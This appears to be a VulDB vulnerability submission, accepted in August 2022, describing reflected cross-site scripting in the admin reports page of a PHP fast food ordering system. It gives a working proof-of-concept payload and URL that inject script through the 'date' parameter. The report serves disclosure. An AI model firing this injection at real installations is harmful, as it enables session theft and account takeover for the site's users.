| 标题 | Ffos exists XSS |
|---|
| 描述 | /ffos/admin/reports/index.php Line 18 of index.php sends unvalidated data to a web browser, which can result in the browser executing malicious code.It is recommended to fix this vulnerability as soon as possible.
payload:\"><sCrIpT>alert(1)</sCrIpT>"
The verification and utilization of this vulnerability is very simple. It can be verified by using URL + payload:
url: http://localhost/ffos/admin/?page=reports&date=2022-08-27\%22%3E%3CsCrIpT%3Ealert(1)%3C/sCrIpT%3E |
|---|
| 来源 | ⚠️ https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html |
|---|
| 用户 | 0x14d (UID 31582) |
|---|
| 提交 | 2022-08-27 06時21分 (4 年前) |
|---|
| 管理 | 2022-08-27 10時44分 (4 hours later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 207425 [oretnom23 Fast Food Ordering System admin/?page=reports 日期 跨网站脚本] |
|---|
| 积分 | 16 |
|---|